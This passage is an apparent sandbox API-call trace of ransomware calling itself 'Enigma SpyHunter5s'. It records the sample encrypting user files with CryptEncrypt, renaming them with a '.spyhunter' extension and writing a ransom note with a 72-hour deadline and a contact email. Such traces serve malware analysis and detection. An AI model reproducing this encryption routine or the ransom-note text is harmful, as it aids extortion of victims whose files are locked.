dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.022] GetProcessHeap () returned 0x2c0000 [0143.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ece0 | out: hHeap=0x2c0000) returned 1 [0143.022] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f308 | out: pbBuffer=0x248f308) returned 1 [0143.022] GetProcessHeap () returned 0x2c0000 [0143.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.022] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f300*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f300*=0x30) returned 1 [0143.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\." (normalized: "c:\\users\\public\\pictures\\sample pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ee30 | out: hHeap=0x2c0000) returned 1 [0143.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f308 | out: pbBuffer=0x248f308) returned 1 [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f300*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f300*=0x30) returned 1 [0143.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.." (normalized: "c:\\users\\public\\music"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b268 | out: hHeap=0x2c0000) returned 1 [0143.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f300 | out: pbBuffer=0x248f300) returned 1 [0143.023] GetProcessHeap () returned 0x2c0000 [0143.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2f8*=0x30) returned 1 [0143.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\." (normalized: "c:\\users\\public\\music\\sample music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.024] GetProcessHeap () returned 0x2c0000 [0143.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.024] GetProcessHeap () returned 0x2c0000 [0143.024] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b448 | out: hHeap=0x2c0000) returned 1 [0143.024] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f300 | out: pbBuffer=0x248f300) returned 1 [0143.024] GetProcessHeap () returned 0x2c0000 [0143.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.024] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2f8*=0x30) returned 1 [0143.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.025] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0143.025] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".txt") returned 0x0 [0143.025] GetProcessHeap () returned 0x2c0000 [0143.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.025] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f2bc*=0x2800, lpOverlapped=0x0) returned 1 [0143.186] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.186] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f2bc*=0x2800, lpOverlapped=0x0) returned 1 [0143.186] GetProcessHeap () returned 0x2c0000 [0143.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.186] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.186] WriteFile (in: hFile=0x120, lpBuffer=0x248f2fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2bc, lpOverlapped=0x0 | out: lpBuffer=0x248f2fc*, lpNumberOfBytesWritten=0x248f2bc*=0x4, lpOverlapped=0x0) returned 1 [0143.187] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2bc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2bc*=0x30, lpOverlapped=0x0) returned 1 [0143.187] CloseHandle (hObject=0x120) returned 1 [0143.187] GetProcessHeap () returned 0x2c0000 [0143.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.187] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.spyhunter") returned 123 [0143.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.spyhunter")) returned 1 [0143.188] GetProcessHeap () returned 0x2c0000 [0143.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.188] GetProcessHeap () returned 0x2c0000 [0143.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.189] GetProcessHeap () returned 0x2c0000 [0143.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5d118 | out: hHeap=0x2c0000) returned 1 [0143.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2f8 | out: pbBuffer=0x248f2f8) returned 1 [0143.189] GetProcessHeap () returned 0x2c0000 [0143.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2f0*=0x30) returned 1 [0143.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.190] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0143.190] StrStrW (lpFirst="NTUSER.DAT", lpSrch=".txt") returned 0x0 [0143.190] GetProcessHeap () returned 0x2c0000 [0143.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.190] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f2b4*=0x2800, lpOverlapped=0x0) returned 1 [0143.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.255] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f2b4*=0x2800, lpOverlapped=0x0) returned 1 [0143.255] GetProcessHeap () returned 0x2c0000 [0143.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.255] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.255] WriteFile (in: hFile=0x120, lpBuffer=0x248f2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2b4, lpOverlapped=0x0 | out: lpBuffer=0x248f2f4*, lpNumberOfBytesWritten=0x248f2b4*=0x4, lpOverlapped=0x0) returned 1 [0143.256] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2b4*=0x30, lpOverlapped=0x0) returned 1 [0143.256] CloseHandle (hObject=0x120) returned 1 [0143.256] GetProcessHeap () returned 0x2c0000 [0143.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.256] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.spyhunter") returned 41 [0143.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.spyhunter" (normalized: "c:\\users\\default\\ntuser.dat.spyhunter")) returned 1 [0143.257] GetProcessHeap () returned 0x2c0000 [0143.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.257] GetProcessHeap () returned 0x2c0000 [0143.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.257] GetProcessHeap () returned 0x2c0000 [0143.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36958 | out: hHeap=0x2c0000) returned 1 [0143.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\default\\music\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.257] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0143.257] WriteFile (in: hFile=0x120, lpBuffer=0x248f22b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x248f22b*, lpNumberOfBytesWritten=0x248f354*=0x127, lpOverlapped=0x0) returned 1 [0143.258] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0143.258] WriteFile (in: hFile=0x120, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f354*=0x2ac, lpOverlapped=0x0) returned 1 [0143.260] CloseHandle (hObject=0x120) returned 1 [0143.260] GetProcessHeap () returned 0x2c0000 [0143.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b088 | out: hHeap=0x2c0000) returned 1 [0143.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2f0 | out: pbBuffer=0x248f2f0) returned 1 [0143.260] GetProcessHeap () returned 0x2c0000 [0143.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2e8*=0x30) returned 1 [0143.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0143.260] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0143.260] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0143.260] GetProcessHeap () returned 0x2c0000 [0143.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0143.261] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f2ac*=0x1f8, lpOverlapped=0x0) returned 1 [0143.261] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.261] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f2ac*=0x1f8, lpOverlapped=0x0) returned 1 [0143.261] GetProcessHeap () returned 0x2c0000 [0143.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0143.262] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.262] WriteFile (in: hFile=0x120, lpBuffer=0x248f2ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x248f2ec*, lpNumberOfBytesWritten=0x248f2ac*=0x4, lpOverlapped=0x0) returned 1 [0143.262] WriteFile (in: hFile=0x120, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f2ac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f2ac*=0x30, lpOverlapped=0x0) returned 1 [0143.262] CloseHandle (hObject=0x120) returned 1 [0143.262] GetProcessHeap () returned 0x2c0000 [0143.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0143.262] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.spyhunter") returned 48 [0143.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\music\\desktop.ini.spyhunter")) returned 1 [0143.262] GetProcessHeap () returned 0x2c0000 [0143.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0143.262] GetProcessHeap () returned 0x2c0000 [0143.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.263] GetProcessHeap () returned 0x2c0000 [0143.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c228f8 | out: hHeap=0x2c0000) returned 1 [0143.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2f0 | out: pbBuffer=0x248f2f0) returned 1 [0143.263] GetProcessHeap () returned 0x2c0000 [0143.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2e8*=0x30) returned 1 [0143.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.263] GetProcessHeap () returned 0x2c0000 [0143.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.263] GetProcessHeap () returned 0x2c0000 [0143.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f368d0 | out: hHeap=0x2c0000) returned 1 [0143.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2e8 | out: pbBuffer=0x248f2e8) returned 1 [0143.263] GetProcessHeap () returned 0x2c0000 [0143.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2e0*=0x30) returned 1 [0143.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\." (normalized: "c:\\users\\default\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.282] GetProcessHeap () returned 0x2c0000 [0143.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.282] GetProcessHeap () returned 0x2c0000 [0143.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36848 | out: hHeap=0x2c0000) returned 1 [0143.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2e8 | out: pbBuffer=0x248f2e8) returned 1 [0143.282] GetProcessHeap () returned 0x2c0000 [0143.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2e0*=0x30) returned 1 [0143.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\." (normalized: "c:\\users\\default\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.546] GetProcessHeap () returned 0x2c0000 [0143.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.546] GetProcessHeap () returned 0x2c0000 [0143.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36738 | out: hHeap=0x2c0000) returned 1 [0143.546] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2e0 | out: pbBuffer=0x248f2e0) returned 1 [0143.546] GetProcessHeap () returned 0x2c0000 [0143.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.546] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2d8*=0x30) returned 1 [0143.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.646] GetProcessHeap () returned 0x2c0000 [0143.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0143.646] GetProcessHeap () returned 0x2c0000 [0143.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe5a8 | out: hHeap=0x2c0000) returned 1 [0143.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f2e0 | out: pbBuffer=0x248f2e0) returned 1 [0143.646] GetProcessHeap () returned 0x2c0000 [0143.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0143.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f2d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f2d8*=0x30) returned 1 [0143.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0143.674] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0143.674] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0143.674] GetProcessHeap () returned 0x2c0000 [0143.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0143.674] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f29c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f29c*=0x0, lpOverlapped=0x0) returned 1 [0143.674] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.675] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f29c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f29c*=0x0, lpOverlapped=0x0) returned 1 [0143.675] GetProcessHeap () returned 0x2c0000 [0143.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0143.675] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.675] WriteFile (in: hFile=0xac, lpBuffer=0x248f2dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f29c, lpOverlapped=0x0 | out: lpBuffer=0x248f2dc*, lpNumberOfBytesWritten=0x248f29c*=0x4, lpOverlapped=0x0) returned 1 [0143.679] WriteFile (in: hFile=0xac, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f29c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f29c*=0x30, lpOverlapped=0x0) returned 1 [0143.679] CloseHandle (hObject=0xac) returned 1 [0143.679] GetProcessHeap () returned 0x2c0000 [0143.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0143.679] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.spyhunter") returned 115 [0143.679] MoveFileW 